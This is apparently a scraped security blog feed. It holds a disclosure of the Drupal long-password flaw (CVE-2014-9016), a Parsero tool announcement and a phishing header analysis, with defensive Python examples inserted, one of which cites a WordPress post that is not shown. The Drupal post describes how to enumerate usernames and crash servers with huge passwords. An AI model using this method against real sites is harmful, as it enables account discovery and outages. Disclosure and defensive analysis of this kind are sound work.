<span style="font-weight: normal;">Vulnerability Details</span></h2>
<div style="text-align: justify;">
We've been researching Drupal security and would like to share our results with you. We have discovered a vulnerability that can be used against default Drupal installations in order to:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li> Guess usernames</li>
<li>Perform a Denial of Service </li>
</ul>
<br />
<div style="text-align: justify;">
With the scenarios below, we will show you how this attack works. When we want to log in to a Drupal site, we need to type a username and a password:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Scenario 1:</u></div>
<div style="text-align: justify;">
If the username doesn't exist, no password hash is calculated at all.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Scenario 2:</u></div>
<div style="text-align: justify;">
If the username exists, the password hash is calculated and compared with the hash stored in the database. If the hashes match, you are granted access to the system; if not, you are rejected.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Scenario 3 - Taking advantage of the vulnerability:</u><br />
<br />
<u>User guessing </u></div>
<div style="text-align: justify;">
If the username exists and the password typed is, for example, 1000000 A's, generating the hash of such a long password in order to compare it with the hash stored in the database takes much longer, and the measured response time increases. So if the delay increases, the username exists.<br />
<br />
In Drupal, the way the password hash is calculated (SHA512 with a salt) using <a href="http://www.openwall.com/phpass/" target="_blank">phpass</a> means that CPU resources are heavily consumed when really long passwords are provided.</div>
<div style="text-align: justify;">
<br />
<u>Denial of service</u></div>
<div style="text-align: justify;">
If we perform several login attempts with a valid username at the same time, using long passwords, this causes a Denial of Service on the server. We observed two different scenarios in a Drupal 7.32, Apache and MySQL default installation. Depending on how many login attempts are made and the time between them, we get two different scenarios:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>The DoS attack crashes the entire server because RAM and swap are exhausted; the CPU is also saturated.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuokLUGGwZeRNz3elLcq2E3whAqKPFGKRUOhxJIW2_ZZFwegdbk2JtV7CMxKU1H7zy-bdH9yEiJq35MO8fYwEqA3Qol9TUuKgOv4NxXCTB6k8637GH30rtJmHQ_5f-8TsgqvB_VwvW6_E/s1600/Drupal_Crash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuokLUGGwZeRNz3elLcq2E3whAqKPFGKRUOhxJIW2_ZZFwegdbk2JtV7CMxKU1H7zy-bdH9yEiJq35MO8fYwEqA3Qol9TUuKgOv4NxXCTB6k8637GH30rtJmHQ_5f-8TsgqvB_VwvW6_E/s1600/Drupal_Crash.png" height="222" width="400" /></a></div>
<br />
<ul style="text-align: justify;">
<li style="text-align: justify;">The DoS attack crashes the database.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqKN46afm-Y9W1SmNrH9JqtsowSQR0rEJy9yiaLD5KTU-gBkL-EG4DEWRvDXuAyTBfBVK3_pUuztKbInMhkA_EBr_7u7DhBBcpj_0oxHfbDDoCPuwc26BzNCKUwynMXJsit03-ngjg__g/s1600/Drupal_Crashed_III.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqKN46afm-Y9W1SmNrH9JqtsowSQR0rEJy9yiaLD5KTU-gBkL-EG4DEWRvDXuAyTBfBVK3_pUuztKbInMhkA_EBr_7u7DhBBcpj_0oxHfbDDoCPuwc26BzNCKUwynMXJsit03-ngjg__g/s1600/Drupal_Crashed_III.png" height="109" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Notice the server doesn't crash because of the hash calculation alone. The vulnerability appears in conjunction with Apache, because Apache waits for PHP to finish the hash calculation. In a concurrent authentication process with a valid user and very long passwords, on the one hand PHP consumes the CPU with hash calculations, and on the other hand the Apache processes that are waiting consume the memory until the server or the database crashes.<br />
<br />
If the Apache configuration is optimized and tuned to the hardware resources, we are able to exhaust all available sessions quickly and hold them for 30 seconds, which produces a DoS without crashing the server or the database.<br />
<br />
Why did we say 30 seconds?<br />
<br />
30 seconds is the maximum time a script is allowed to run before it is terminated by the parser. By default, the <a href="http://php.net/manual/en/function.set-time-limit.php" target="_blank">max_execution_time</a> value is set to 30 in the php.ini config. This helps prevent poorly written scripts from tying up the server.</div>
<h2>
How to fix</h2>
<div style="text-align: justify;">
Install the latest version:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>If you use Drupal 7.x, upgrade to <a href="https://www.drupal.org/drupal-7.34-release-notes" target="_blank">Drupal core 7.34</a>. </li>
</ul>
<div style="text-align: justify;">
<ul>
<li>If you use the Secure Password Hashes module for Drupal 6.x, upgrade to <a href="https://www.drupal.org/node/2378375">Secure Password Hashes 6.x-2.1</a>. Also see the <a href="https://www.drupal.org/project/phpass">Secure Password Hashes</a> project page.</li>
</ul>
</div>
<ul style="text-align: justify;">
<li>If you have configured a custom password.inc file for your site, you need to make sure that it is not prone to the same vulnerability.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Drupal 7.34 checks the password length so that passwords longer than 512 bytes are never hashed.<br />
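Added example, not phpass, WordPress or Drupal code, serving this fix and the WordPress post's 4096-character limit: it models phpass' iterated hash loop to show why the work per login grows with the password length, puts the pre-patch check (scenarios 1 and 2 above) beside a hardened one that refuses long passwords before hashing, and goes one step beyond the shipped fix by hashing against a dummy record so an unknown username costs the same as a known one. The user table, the passwords, and the round counts (WordPress uses count 8 with MD5, Drupal 7 defaults to 16 with SHA-512) are assumptions for this example.

```python
import hashlib
import hmac
import os

# Modelled on phpass' portable hash: hash(salt + password) once, then
# 2**count_log2 rounds of hash(previous_digest + password). Every round
# re-hashes the whole password, so the work is rounds * (digest + len(password)).
# The setting string and phpass' own output encoding are left out (added example).
def phpass_like_hash(password, salt, count_log2, algo="md5"):
    """Return (digest, bytes_hashed); bytes_hashed is the work spent."""
    digest = hashlib.new(algo, salt + password).digest()
    work = len(salt) + len(password)
    for _ in range(1 << count_log2):
        digest = hashlib.new(algo, digest + password).digest()
        work += len(digest) + len(password)
    return digest, work


def bytes_hashed(password_len, count_log2, digest_size=16, salt_len=8):
    """Closed form of the work phpass_like_hash does for one login attempt."""
    return salt_len + password_len + (1 << count_log2) * (digest_size + password_len)


def make_user(password, count_log2=8):
    """Constructed user record (count_log2 = 8 with MD5, as WordPress uses)."""
    salt = os.urandom(8)
    digest, _ = phpass_like_hash(password, salt, count_log2)
    return {"salt": salt, "count_log2": count_log2, "digest": digest}


USERS = {"admin": make_user(b"correct horse battery staple")}   # constructed
DUMMY_USER = make_user(b"placeholder")   # hashed against when the user is unknown


def login_vulnerable(users, username, password):
    """Pre-patch behaviour: unknown user -> no hashing at all (scenario 1),
    known user -> hash whatever length was submitted (scenario 2)."""
    rec = users.get(username)
    if rec is None:
        return False, 0
    digest, work = phpass_like_hash(password, rec["salt"], rec["count_log2"])
    return hmac.compare_digest(digest, rec["digest"]), work


def login_hardened(users, username, password, max_len=4096):
    """Refuse over-long passwords before any hashing (WordPress 4.0.1 hashes
    only < 4096, Drupal 7.34 only <= 512) and spend the same work on unknown
    users, so neither the length nor the existence of the user shows in the delay."""
    if len(password) >= max_len:
        return False, 0
    rec = users.get(username)
    known = rec is not None
    if not known:
        rec = DUMMY_USER
    digest, work = phpass_like_hash(password, rec["salt"], rec["count_log2"])
    return hmac.compare_digest(digest, rec["digest"]) and known, work


if __name__ == "__main__":
    mib = 1024 * 1024
    print("WordPress-style (MD5, 2**8 rounds), 1,000,000-char password:",
          f"{bytes_hashed(1_000_000, 8) / mib:.0f} MiB hashed per attempt")
    print("Drupal 7-style (SHA-512, 2**16 rounds), 1,000,000-char password:",
          f"{bytes_hashed(1_000_000, 16, digest_size=64) / mib:.0f} MiB hashed per attempt")
    for name in ("admin", "nobody"):
        print(f"vulnerable {name:7} 100000-char: work={login_vulnerable(USERS, name, b'A' * 100_000)[1]}")
        print(f"hardened   {name:7} 100000-char: work={login_hardened(USERS, name, b'A' * 100_000)[1]}")
        print(f"hardened   {name:7}   1000-char: work={login_hardened(USERS, name, b'A' * 1000)[1]}")
```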
<h2>
Proof of Concept</h2>
<a href="http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html" target="_blank">http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html</a><br />
<h2>
CVE information</h2>
CVE-2014-9016 has been assigned to this vulnerability.<br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016</a></div>
<h2>
Timeline</h2>
<div style="text-align: justify;">
October 23, 2014 at 5:11am - We sent a complete report about the vulnerability to Drupal.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
October 23, 2014 at 6:43am - Drupal answered confirming the vulnerability and proposing a patch.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
November 19, 2014 at 8:54pm - A Drupal security update and the security advisory are published.<br />
<br />
December 01, 2014 16:05 - Proof of concept published </div>
<h2>
References</h2>
<div id=":pv.co">
<a href="http://www.openwall.com/phpass/" target="_blank">http://www.openwall.com/phpass/</a> </div>
<br />
<a href="http://www.devconsole.info/?p=963" target="_blank">http://www.devconsole.info/?p=963 </a><br />
<br />
<a href="http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/" target="_blank">http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/</a><br />
<br />
<a href="https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/" target="_blank">https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/ </a><br />
<br />
<a href="http://www.breaksec.com/?p=6362" target="_blank">http://www.breaksec.com/?p=6362</a><br />
<br />
Javier Nieto, 2014-09-02: Parsero v0.75 has been included in the Kali Linux repository<div style="text-align: justify;">
Some days ago a friend told me, "Hey! Why didn't you write a post talking about how Parsero has been included in the Kali Linux repository?" "Seriously? I forgot..." So here it is...<br />
<br />
As you already know, <a href="http://www.kali.org/" target="_blank">Kali Linux</a> is one of the most advanced and versatile penetration testing distributions ever made. Kali Linux grew out of an earlier live Linux distribution named <a href="http://www.backtrack-linux.org/" target="_blank">BackTrack</a>. It is a GPL-compliant Linux distribution built by penetration testers for penetration testers. With millions of downloads, it has become the most widely adopted penetration testing framework in existence and is used by the security community all over the world.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
That is the reason why I am really proud to announce that my tool <a href="http://www.behindthefirewalls.com/search/label/Parsero" target="_blank">Parsero</a> has been included in the Kali Linux repositories: <a class="moz-txt-link-freetext" href="http://tools.kali.org/information-gathering/parsero">http://tools.kali.org/information-gathering/parsero</a> <br />
<br />
Parsero is a free script written in Python which reads the robots.txt file of a web server and looks at the Disallow entries. The Disallow entries are the URL paths of directories or files hosted on the web server which the administrators don't want to be indexed by crawlers. For example, "Disallow: /portal/login" tells search engines such as Google, Bing or Yahoo not to index <a href="http://www.example.com/portal/login">www.example.com/portal/login</a>, so nobody can locate it by searching on them.<br />
<br />
<div style="text-align: justify;">
Sometimes the paths listed in the Disallow entries are directly accessible by users (without using a search engine), just by visiting the URL and the path. Sometimes they are not available to anybody... Because it is really common for administrators to write a lot of Disallow entries, some of which are reachable and some of which are not, you can use Parsero to request each Disallow entry and check its HTTP status code, so you know automatically which of these directories are reachable and which are not.</div>
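<div style="text-align: justify;">
The check described above, as an added example that is not Parsero's own code: a small Python script parses the Disallow entries from a robots.txt body and reports the HTTP status code of each path, so an administrator can audit which "hidden" paths actually answer 200. The robots.txt text and the status table (<code>FAKE_SITE</code>) are constructed for the example; <code>live_status</code> is a real fetcher that can be passed in its place to audit a server you are responsible for. The parser also drops comments and empty Disallow lines and skips wildcard entries, which are matching rules rather than fetchable URLs.</div>

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Constructed robots.txt for the example (not taken from a real site).
SAMPLE_ROBOTS = """\
# robots.txt for www.example.com (constructed sample)
User-agent: *
Disallow: /portal/login
Disallow: /admin/
Disallow: /backup/db.sql   # trailing comments are allowed
Allow: /public/
Disallow:                  # an empty Disallow means "nothing is disallowed"
Disallow: /*.bak$
Sitemap: http://www.example.com/sitemap.xml

User-agent: Googlebot
Disallow: /drafts/
"""

# Constructed stand-in for the web server: path -> status code it would return.
FAKE_SITE = {
    "/portal/login": 200,
    "/admin/": 403,
    "/backup/db.sql": 200,
    "/drafts/": 404,
}


def parse_disallow(robots_text):
    """Return the unique Disallow paths of a robots.txt body, in file order.

    Comments (after '#') and blank values are dropped, the field name is
    matched case-insensitively, and entries from every User-agent group count.
    """
    paths = []
    for raw in robots_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        if field.strip().lower() != "disallow":
            continue
        value = value.strip()
        if value and value not in paths:
            paths.append(value)
    return paths


def is_pattern(path):
    """Wildcard entries are matching rules, not URLs that can be requested."""
    return "*" in path or "$" in path


def fake_status(url):
    """Look the path up in the constructed FAKE_SITE table (404 when absent)."""
    return FAKE_SITE.get(urlparse(url).path, 404)


def live_status(url, timeout=10):
    """Real fetcher: GET the URL and return its HTTP status code (needs network)."""
    req = urllib.request.Request(url, headers={"User-Agent": "robots-audit/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_disallows(base_url, robots_text, status_of=fake_status):
    """Return (path, url, status) per Disallow entry; wildcard patterns get None."""
    results = []
    for path in parse_disallow(robots_text):
        url = urljoin(base_url, path)
        status = None if is_pattern(path) else status_of(url)
        results.append((path, url, status))
    return results


def exposed_paths(results):
    """Disallowed paths answering 200: hidden from crawlers, reachable by anyone."""
    return [path for path, _, status in results if status == 200]


if __name__ == "__main__":
    report = check_disallows("http://www.example.com", SAMPLE_ROBOTS)
    for path, url, status in report:
        print(f"{str(status):>4}  {url}")
    print("reachable:", exposed_paths(report))
```

<div style="text-align: justify;">
Swapping <code>fake_status</code> for <code>live_status</code> in <code>check_disallows</code> turns the script into a real audit of your own robots.txt; a 200 on a path you intended to keep private means the file is protected only by not being indexed.</div>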
<div style="text-align: justify;">
<br />
Also, the fact that the administrator writes a robots.txt doesn't mean that the files or directories listed in it will not be indexed by Bing, Google, Yahoo... For this reason, Parsero is capable of searching Bing to locate content that has been indexed without the web administrator's authorization.</div>
</div>
<div style="text-align: justify;">
<br />
Now, you can run Parsero v0.75 directly from this awesome distribution. So, what do you need to use Parsero in Kali Linux?<br />
<h2>
Installing Parsero in Kali Linux </h2>
</div>
<div style="text-align: justify;">
First of all, you need to execute:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<span style="font-family: inherit;">root@kali:~# apt-get update</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguUXeRtBNnrkS8l1NayMQJc6LEutCYx-i-kpmjnTNc5skwkBrXjjkGNtWnE7KuuSPwx2razvIiM8UDW2MYN8kCsxlmd5PjWjJvmAL_wzUIQxTzO-Cmcia8oEv9oguvipxCxHNt1AYi6Ds/s1600/Kali_Linux2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguUXeRtBNnrkS8l1NayMQJc6LEutCYx-i-kpmjnTNc5skwkBrXjjkGNtWnE7KuuSPwx2razvIiM8UDW2MYN8kCsxlmd5PjWjJvmAL_wzUIQxTzO-Cmcia8oEv9oguvipxCxHNt1AYi6Ds/s1600/Kali_Linux2.png" height="403" width="640" /></a></div>
<br />
Then, you can search for Parsero directly in the Kali Linux repositories by using the command below:<br />
<div style="text-align: center;">
<br />
root@kali:~# apt-cache search parsero </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhLBTBbZ2SZTNIlYv_odSkg8PhrRHxdWiTNl-reIE2OK1mgsusCngwg5TJn9ASL5-33lakYAlv2pZv5QKKjA9BdheJurVGBWW33KG8__hhZm6_mNqYeLce7x0e9ffLaQbMGKfaNmf3Y58/s1600/Kali_Linux3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhLBTBbZ2SZTNIlYv_odSkg8PhrRHxdWiTNl-reIE2OK1mgsusCngwg5TJn9ASL5-33lakYAlv2pZv5QKKjA9BdheJurVGBWW33KG8__hhZm6_mNqYeLce7x0e9ffLaQbMGKfaNmf3Y58/s1600/Kali_Linux3.png" height="35" width="320" /></a></div>
<br />
<br />
Finally, run the following command to install it.<br />
<br />
<div style="text-align: center;">
root@kali:~# apt-get install parsero</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YKf74o8n6yTrxTnri5gq8Z7EMZh_IYJqYiBMTTS0rJpQ7TDONLfbG6FelBdixrjB-yGWer3YOAnh-dfa8NuIlAI70eZbYnwbfeiN3bys4iYgteswhNHP-cBulZRRfKiM_yxSHnzM3Zg/s1600/Kali_Linux4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YKf74o8n6yTrxTnri5gq8Z7EMZh_IYJqYiBMTTS0rJpQ7TDONLfbG6FelBdixrjB-yGWer3YOAnh-dfa8NuIlAI70eZbYnwbfeiN3bys4iYgteswhNHP-cBulZRRfKiM_yxSHnzM3Zg/s1600/Kali_Linux4.png" height="401" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Now you can have fun checking the directories or files which could hold sensitive information and were supposed to stay "anonymous" to the search engines...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEildmFQL5Wq8Abm-EIPuJe_rbsM5sEWBxKLR3CYEsB1RAvpAZTfKbK9t6w-IX-nrHTWEJKi57P6Y7ycM9KPvdlkJA8txT9muI-6pblDRLDHuKXnUFW4eHZ-NWMbeLGpg4VyG1JMbKZyBPs/s1600/Kali_Linux6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEildmFQL5Wq8Abm-EIPuJe_rbsM5sEWBxKLR3CYEsB1RAvpAZTfKbK9t6w-IX-nrHTWEJKi57P6Y7ycM9KPvdlkJA8txT9muI-6pblDRLDHuKXnUFW4eHZ-NWMbeLGpg4VyG1JMbKZyBPs/s1600/Kali_Linux6.png" height="432" width="640" /></a></div>
<br />
Currently, I'm working on developing the new release which will have another feature. It will be available here: <a href="https://github.com/behindthefirewalls/Parsero" target="_blank">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-8066850089112244012014-08-26T05:34:00.000-07:002014-08-27T02:39:10.581-07:00Have I bought these clothes? Another spread malware campaign.<div style="text-align: justify;">
While reading one of <a href="http://www.fireeye.com/blog/technical/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html" target="_blank">FireEye's latest posts</a>, I was struck by the binary which they said came in the form of a phishing email (MD5:7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order. I believe it is interesting to analyze because it could be a real example of an APT or maybe just another spread malware campaign. The techniques used in this real case could be used in both scenarios...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But FireEye only shared the mail's MD5 checksum and didn't provide a copy of the message. Thanks to the <a href="http://contagiodump.blogspot.com.es/2014/07/cz-solution-ltd-signed-samples-of.html" target="_blank">latest ContagioDump post</a>, we are able to download all the samples and a little more than FireEye previously mentioned.</div>
<div style="text-align: justify;">
<br />
After downloading and opening the message, we can see its details in the picture below. It appears to have been sent by confirmation(at)armani[.]com and contains what looks like an order with a file attached.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqaW7JDncZ5jOFO1fe3GIe7ljxODAiXBA2wBMkedoHxxlXkGeJVF1-FvLHzChhm2lhGy13VOD1lqrUiC-bhKF3eF1Ued3wVl75kDUnm9SSMsgx5wRg8d43ZoYh41V2pDi4FFeR8qQEAe4/s1600/AC-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqaW7JDncZ5jOFO1fe3GIe7ljxODAiXBA2wBMkedoHxxlXkGeJVF1-FvLHzChhm2lhGy13VOD1lqrUiC-bhKF3eF1Ued3wVl75kDUnm9SSMsgx5wRg8d43ZoYh41V2pDi4FFeR8qQEAe4/s1600/AC-1.png" height="338" width="640" /></a></div>
<h2>
Analysing the SMTP headers</h2>
Before opening the attached file, let's look at the mail headers to dig into who really sent the message. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9NQL4RC74UK2JhwPEK0Epk_xIVtMWyb4buN8bBF4hRlyf53DN_0H6AwW-c4KbHEgVYRB28lOEofSsfbottwndVJJC2jWxxDgnTIyJagh3mskqxon_Qu9jjr91-mXSa4e9lTqAm5Rqwe8/s1600/AC-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9NQL4RC74UK2JhwPEK0Epk_xIVtMWyb4buN8bBF4hRlyf53DN_0H6AwW-c4KbHEgVYRB28lOEofSsfbottwndVJJC2jWxxDgnTIyJagh3mskqxon_Qu9jjr91-mXSa4e9lTqAm5Rqwe8/s1600/AC-2.png" height="112" width="400" /></a></div>
<br />
We can see that the <a href="http://db-ip.com/78.250.54.171" target="_blank">IP</a> which sent the mail comes from Paris, and the <a href="https://who.is/whois-ip/ip-address/78.250.54.171" target="_blank">WHOIS</a> description tells us that this IP belongs to a "Wifi Address Pool". Maybe it is a free Wifi or a hacked Wifi the hackers were connected to when they sent the email, or maybe the host which delivered the mail was infected and was connected to this Wifi when the mail was sent...<br />
<br />
By reading the mail headers, we can get more information such as the mail's hops. Notice the second one has been <a href="http://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a212.227.126.130&run=toolpage" target="_blank">blacklisted</a>. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5D3rEPj6Nhe1WdmM-Y5VttaZh-eul6_UGRDg_FN3szwXo4-3u8zlqI5SZ3Ds6xmPbXYHClmFvV7DrcGtbwJbaKJwff5aVyg2ct18ExHCJHoBkKY7XJDeTTGX85VuhB7V-P9t9ItMsx8/s1600/AC-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5D3rEPj6Nhe1WdmM-Y5VttaZh-eul6_UGRDg_FN3szwXo4-3u8zlqI5SZ3Ds6xmPbXYHClmFvV7DrcGtbwJbaKJwff5aVyg2ct18ExHCJHoBkKY7XJDeTTGX85VuhB7V-P9t9ItMsx8/s1600/AC-3.png" height="124" width="640" /></a></div>
<br />
If we continue analyzing the headers we can see something weird...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg1fbE02322qyxrmNBn3dHKcozYaM1THJo94fyMZj_GtIUpR8W0SjIjLAVwuFXK-AxvPIiyQrFGZznhHy0SmT72FQITp8IWsiyyhOuRmlx83Zmk_Og6IGKwequTGfgpq9KttCW_RpKc-U/s1600/AC-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg1fbE02322qyxrmNBn3dHKcozYaM1THJo94fyMZj_GtIUpR8W0SjIjLAVwuFXK-AxvPIiyQrFGZznhHy0SmT72FQITp8IWsiyyhOuRmlx83Zmk_Og6IGKwequTGfgpq9KttCW_RpKc-U/s1600/AC-4.png" height="263" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYindaO0nFQwMYAY6VpdB4XyCtEvFH3EHBnHkRLOl7b17Efq5J8q0cJmUS1y50mkbw_1m-4YQL_gD5mdltOPEXkbHaBKUgWOTBgD8x9OSSnc8iJSVA8gsrsCZRsfIwaBvxBe5lku9LQwM/s1600/AC-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYindaO0nFQwMYAY6VpdB4XyCtEvFH3EHBnHkRLOl7b17Efq5J8q0cJmUS1y50mkbw_1m-4YQL_gD5mdltOPEXkbHaBKUgWOTBgD8x9OSSnc8iJSVA8gsrsCZRsfIwaBvxBe5lku9LQwM/s1600/AC-5.png" /></a></div>
<br />
In the pictures above we can see that the X-Sender and the Return-Path belong to a hotel mail account. These fields mean:<br />
<br />
<ul>
<li>X-Sender: tells us the real sender directly in the message headers.</li>
<li>Return-Path: denotes the real sender, but only "post factum".</li>
</ul>
<br />
I've checked that the SMTP servers from which the mail was sent require authentication to send e-mails. Also, the hotel mail account which delivered the mails used the <a href="http://postmaster.1and1.com/en/email-server/" target="_blank">SMTP servers</a> of the same hosting provider that hosts the hotel's website. So we could assume that this hotel uses these servers to send mail and that the mail account could have been stolen. The hackers sent the phishing mail from the hotel account but changed the "From" to confirmation(at)armani[.]com<br />
<br /></div>
<div style="text-align: justify;">
Also, we can see that the spoofed company's domain name doesn't have an <a href="http://mxtoolbox.com/SuperTool.aspx?action=spf%3aarmani.com&run=toolpage" target="_blank">SPF record</a>. That makes it easier to send an email with a faked "From". An SPF record helps prevent spammers from sending messages with forged From addresses. Here you can get more valuable <a href="https://support.google.com/a/answer/33786?hl=en" target="_blank">info about SPF</a>.<br />
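<div style="text-align: justify;">
A way to automate the header checks made above, as an added example (not from FireEye, ContagioDump or this post): the script parses a constructed message modelled on this case, lists the Received hops oldest-first so the submitting host comes out on top, compares the domain of the visible From with the Return-Path and X-Sender domains, and checks whether the From domain publishes an SPF record. All domains, addresses and IPs are placeholders (<code>brand.example</code> for the spoofed brand, <code>hotel.example</code> for the compromised account), and <code>FAKE_TXT</code> is a constructed table standing in for the DNS TXT lookup a real check would perform.</div>

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message modelled on the case in the post: the envelope sender and
# X-Sender are a hotel account, while From claims to be the clothing brand.
# Every name, address and IP here is a placeholder, not the real headers.
SAMPLE_RAW = """\
Return-Path: <reservations@hotel.example>
Received: from mout.mailhost.example ([198.51.100.130])
    by mx.victim.example with ESMTP id 4Kx1; Tue, 22 Jul 2014 10:02:11 +0000
Received: from [203.0.113.171] (wifi-pool.isp.example [203.0.113.171])
    by mout.mailhost.example with ESMTPA; Tue, 22 Jul 2014 10:02:09 +0000
X-Sender: reservations@hotel.example
From: "Brand Confirmation" <confirmation@brand.example>
To: victim@victim.example
Subject: Your order confirmation
Message-ID: <constructed-0001@hotel.example>

Please find your order attached.
"""

# Constructed stand-in for DNS TXT lookups (a real check would query DNS).
FAKE_TXT = {
    "brand.example": ["google-site-verification=constructed"],
    "hotel.example": ["v=spf1 include:_spf.mailhost.example -all"],
}

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def received_hops(msg):
    """Received headers oldest-first: the first entry is the submitting host."""
    return list(reversed(msg.get_all("Received", [])))


def hop_ips(msg):
    """First IPv4 address named in each hop, oldest hop first."""
    ips = []
    for hop in received_hops(msg):
        match = IP_RE.search(hop)
        if match:
            ips.append(match.group(1))
    return ips


def addr_domain(header_value):
    """Lower-cased domain of an address header, or '' when there is none."""
    address = parseaddr(header_value or "")[1]
    return address.rpartition("@")[2].lower() if "@" in address else ""


def sender_domains(msg):
    return {name: addr_domain(msg.get(name)) for name in ("From", "Return-Path", "X-Sender")}


def sender_mismatches(msg):
    """Sender headers whose domain differs from the visible From domain."""
    domains = sender_domains(msg)
    return [
        f"{name} domain {domains[name]!r} differs from From domain {domains['From']!r}"
        for name in ("Return-Path", "X-Sender")
        if domains[name] and domains[name] != domains["From"]
    ]


def has_spf(txt_records):
    """True if any TXT record is an SPF policy."""
    return any(record.strip().lower().startswith("v=spf1") for record in txt_records)


def analyze(raw_message, txt_lookup=FAKE_TXT.get):
    """Summarise the sender evidence of one message in a dict."""
    msg = message_from_string(raw_message)
    from_domain = addr_domain(msg.get("From"))
    ips = hop_ips(msg)
    return {
        "hop_ips": ips,
        "submitting_ip": ips[0] if ips else None,
        "hop_count": len(received_hops(msg)),
        "from_domain": from_domain,
        "mismatches": sender_mismatches(msg),
        "from_domain_has_spf": has_spf(txt_lookup(from_domain) or []),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_RAW).items():
        print(f"{key}: {value}")
```

<div style="text-align: justify;">
On the constructed message the report shows the Wifi-pool address as the submitting host, two sender headers disagreeing with the From domain, and no SPF policy for that domain: the same three observations the screenshots above were used to make by hand.</div>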
<h2>
Tricking the end user</h2>
